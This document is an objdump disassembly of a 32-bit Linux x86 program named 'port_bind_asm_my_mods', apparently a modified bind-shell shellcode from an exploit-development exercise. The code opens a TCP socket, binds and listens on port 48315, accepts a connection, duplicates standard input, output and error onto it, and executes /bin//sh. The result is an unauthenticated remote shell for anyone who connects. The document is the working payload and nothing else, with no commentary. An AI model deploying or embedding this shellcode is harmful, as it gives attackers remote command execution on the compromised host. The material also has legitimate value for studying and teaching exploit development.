
port_bind_asm_my_mods:     file format elf32-i386


Disassembly of section .text:

08048060 <_start>:
 8048060:	31 c0                	xor    %eax,%eax
 8048062:	31 db                	xor    %ebx,%ebx
 8048064:	31 d2                	xor    %edx,%edx
 8048066:	50                   	push   %eax
 8048067:	6a 01                	push   $0x1
 8048069:	6a 02                	push   $0x2
 804806b:	89 e1                	mov    %esp,%ecx
 804806d:	fe c3                	inc    %bl
 804806f:	b0 66                	mov    $0x66,%al
 8048071:	cd 80                	int    $0x80
 8048073:	89 c6                	mov    %eax,%esi
 8048075:	52                   	push   %edx
 8048076:	66 68 bc bb          	pushw  $0xbbbc
 804807a:	66 6a 02             	pushw  $0x2
 804807d:	89 e1                	mov    %esp,%ecx
 804807f:	6a 10                	push   $0x10
 8048081:	51                   	push   %ecx
 8048082:	56                   	push   %esi
 8048083:	89 e1                	mov    %esp,%ecx
 8048085:	fe c3                	inc    %bl
 8048087:	b0 66                	mov    $0x66,%al
 8048089:	cd 80                	int    $0x80
 804808b:	52                   	push   %edx
 804808c:	56                   	push   %esi
 804808d:	89 e1                	mov    %esp,%ecx
 804808f:	b3 04                	mov    $0x4,%bl
 8048091:	b0 66                	mov    $0x66,%al
 8048093:	cd 80                	int    $0x80
 8048095:	52                   	push   %edx
 8048096:	52                   	push   %edx
 8048097:	56                   	push   %esi
 8048098:	89 e1                	mov    %esp,%ecx
 804809a:	fe c3                	inc    %bl
 804809c:	b0 66                	mov    $0x66,%al
 804809e:	cd 80                	int    $0x80
 80480a0:	89 c3                	mov    %eax,%ebx
 80480a2:	31 c9                	xor    %ecx,%ecx
 80480a4:	b0 3f                	mov    $0x3f,%al
 80480a6:	cd 80                	int    $0x80
 80480a8:	41                   	inc    %ecx
 80480a9:	b0 3f                	mov    $0x3f,%al
 80480ab:	cd 80                	int    $0x80
 80480ad:	41                   	inc    %ecx
 80480ae:	b0 3f                	mov    $0x3f,%al
 80480b0:	cd 80                	int    $0x80
 80480b2:	31 c0                	xor    %eax,%eax
 80480b4:	50                   	push   %eax
 80480b5:	68 2f 2f 73 68       	push   $0x68732f2f
 80480ba:	68 2f 62 69 6e       	push   $0x6e69622f
 80480bf:	89 e3                	mov    %esp,%ebx
 80480c1:	50                   	push   %eax
 80480c2:	53                   	push   %ebx
 80480c3:	89 e1                	mov    %esp,%ecx
 80480c5:	31 d2                	xor    %edx,%edx
 80480c7:	b0 0b                	mov    $0xb,%al
 80480c9:	cd 80                	int    $0x80
